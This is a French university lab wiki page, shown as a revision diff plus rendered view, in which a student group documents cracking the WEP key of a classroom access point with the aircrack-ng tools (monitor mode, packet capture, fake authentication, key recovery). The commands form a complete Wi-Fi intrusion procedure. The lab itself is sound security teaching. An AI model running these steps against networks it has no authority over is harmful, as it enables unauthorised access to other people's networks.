TP sysres IMA5sc 2019/2020 G3 : Différence entre versions

De Wiki d'activités IMA
Ligne 1 : Ligne 1 :
Bonjour les zincs
 
 
 
==Mise en place==
 
==Mise en place==
  
  
 
==Cassage de clé WEP==
 
==Cassage de clé WEP==
 +
 +
On utilise pour casser la clé WEP un dongle wifi "Wi-Pi".
 +
Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande
 +
$ iwconfig
 +
 +
On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon
 +
 +
On commence par passer l'interface en mode moniteur :
 +
$ airmon-ng start  wlan0mon
 +
 +
On peut alors visualiser les point d'accès WEP disponibles :
 +
$ airodump-ng --encrypt wep wlan0mon
 +
 +
On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel.
 +
On capture les paquets sur l'interface de craquotte04 via la commande :
 +
$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon
 +
 +
On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès
 +
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon
 +
 +
Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :
 +
$ aircrack-ng ./path_to_folder/cracotte04.cap

Version du 25 novembre 2019 à 14:47

Mise en place

Cassage de clé WEP

On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande

$ iwconfig

On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon

On commence par passer l'interface en mode moniteur :

$ airmon-ng start  wlan0mon

On peut alors visualiser les point d'accès WEP disponibles :

$ airodump-ng --encrypt wep wlan0mon

On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. On capture les paquets sur l'interface de craquotte04 via la commande :

$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon

On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès

$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon

Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :

$ aircrack-ng ./path_to_folder/cracotte04.cap